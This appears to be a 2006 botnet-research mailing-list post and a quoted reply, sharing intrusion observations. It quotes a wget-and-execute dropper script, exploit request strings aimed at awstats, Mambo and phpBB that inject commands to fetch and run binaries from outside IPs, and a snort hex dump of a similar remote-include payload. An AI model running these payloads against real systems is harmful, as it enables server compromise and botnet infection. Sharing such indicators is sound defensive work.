To report a botnet PRIVATELY please email: [EMAIL PROTECTED] ---------- This seems to be quite popular at the moment.
Around Wed 8th March, I saw a drop using this method, described here - http://members.lycos.co.uk/jamieriden/mambo-exploit-obfuscated.pdf Probably not news to most of you, but I was surprised at how many different computers were involved - 216.63.z.z – initiator, 66.98.a.a – server hosting the defacing tool, 216.99.b.b – machine we get the first stage payload from, 217.160.c.c – machine that we connect back to and 219.96.d.d – machine we get the second stage payload from. Anyway, this morning we're back to the usual shell script - #!/bin/bash wget 209.200.224.166/foc chmod 744 foc ./foc wget 209.200.224.166/iron chmod 744 iron ./iron Where 'iron' has the following strings in the binary: GET %sawstats.pl?configdir=|echo;echo%%20YYY;cd%%20%%2ftmp%%3bwget%%2083%%2e16%%2e187%%2e6%%2fcacti%%3bchmod%%20%%2bx%%20cacti%%3b%%2e%%2fcacti;echo%%20YYY;ec ho| HTTP/1.1 Host: %s User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;) /index.php?option=com_content&do_pdf=1&id=1 GET %sindex.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://83.16.187.6/cmd.gif?&cmd=cd%%20/tmp;wget%%2083.16.187. 6/cacti;chmod%%20744%%20cacti;./cacti;echo%%20YYY;echo| HTTP/1.1 Host: %s User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;) GET %sadmin_styles.php?phpbb_root_path=http://83.16.187.6/cmd.dat?&cmd=cd%%20/tmp;wget%%2083.16.187.6/cacti;chmod%%20744%%20cacti;./cacti;echo%%20YYY;echo| HTTP/1.1 and 'foc' looks like the IRC bot. Note cmd.gif is the same or similar to a tool the Philippine Honeynet project describe as "" 'Defacing Tool 2.0 by r3v3ng4ns' is a suite of php based scripts that allows the attacker to send commands to the server primarily with the intent to deface websites. " cheers, Jamie On 08/03/06, bodik <[EMAIL PROTECTED]> wrote: > To report a botnet PRIVATELY please email: [EMAIL PROTECTED] > ---------- > hi, > > this list seems to be for white Jedi ;) so I'll add my contribution. > Even with low expirience I believe I found botnet through snort report > about WEB remote include path: > > #(8 - 452097) [2006-03-07 08:20:04] [local/2002] [snort/2002] WEB-PHP > remote include path > IPv4: 194.249.251.5 -> XXX.XXX.X.XX > hlen=5 TOS=0 dlen=360 ID=23207 flags=0 offset=0 TTL=49 chksum=38897 > TCP: port=44448 -> dport: 80 flags=***AP*** seq=6723088 > ack=1590922881 off=5 res=0 win=5840 urp=0 chksum=17886 > Payload: length = 320 > > 000 : 47 45 54 20 2F 63 76 73 2F 6D 61 6D 62 6F 2F 69 GET /cvs/mambo/i > 010 : 6E 64 65 78 32 2E 70 68 70 3F 5F 52 45 51 55 45 ndex2.php?_REQUE > 020 : 53 54 5B 6F 70 74 69 6F 6E 5D 3D 63 6F 6D 5F 63 ST[option]=com_c > 030 : 6F 6E 74 65 6E 74 26 5F 52 45 51 55 45 53 54 5B ontent&_REQUEST[ > 040 : 49 74 65 6D 69 64 5D 3D 31 26 47 4C 4F 42 41 4C Itemid]=1&GLOBAL > 050 : 53 3D 26 6D 6F 73 43 6F 6E 66 69 67 5F 61 62 73 S=&mosConfig_abs > 060 : 6F 6C 75 74 65 5F 70 61 74 68 3D 68 74 74 70 3A olute_path=http: > 070 : 2F 2F 32 30 34 2E 38 33 2E 35 36 2E 31 34 34 2F //204.83.56.144/ > 080 : 63 6D 64 2E 67 69 66 3F 26 63 6D 64 3D 63 64 25 cmd.gif?&cmd=cd% > 090 : 32 30 2F 74 6D 70 3B 77 67 65 74 25 32 30 32 30 20/tmp;wget%2020 > 0a0 : 34 2E 38 33 2E 35 36 2E 31 34 34 2F 67 69 63 75 4.83.56.144/gicu > 0b0 : 70 6F 3B 63 68 6D 6F 64 25 32 30 37 34 34 25 32 po;chmod%20744%2 > 0c0 : 30 67 69 63 75 70 6F 3B 2E 2F 67 69 63 75 70 6F 0gicupo;./gicupo > 0d0 : 3B 65 63 68 6F 25 32 30 59 59 59 3B 65 63 68 6F ;echo%20YYY;echo > 0e0 : 7C 20 20 48 54 54 50 2F 31 2E 31 0A 48 6F 73 74 | HTTP/1.1.Host > 0f0 : 3A 20 31 34 37 2E 32 32 38 2E 34 2E 32 30 0A 55 : XXX.XXX.X.XX.U > 100 : 73 65 72 2D 41 67 65 6E 74 3A 20 4D 6F 7A 69 6C ser-Agent: Mozil > 110 : 6C 61 2F 34 2E 30 20 28 63 6F 6D 70 61 74 69 62 la/4.0 (compatib > 120 : 6C 65 3B 20 4D 53 49 45 20 36 2E 30 3B 20 57 69 le; MSIE 6.0; Wi > 130 : 6E 64 6F 77 73 20 4E 54 20 35 2E 31 3B 29 0A 0A ndows NT 5.1;).. _______________________________________________ To report a botnet PRIVATELY please email: [EMAIL PROTECTED] All list and server information are public and available to law enforcement upon request. http://www.whitestar.linuxbox.org/mailman/listinfo/botnets
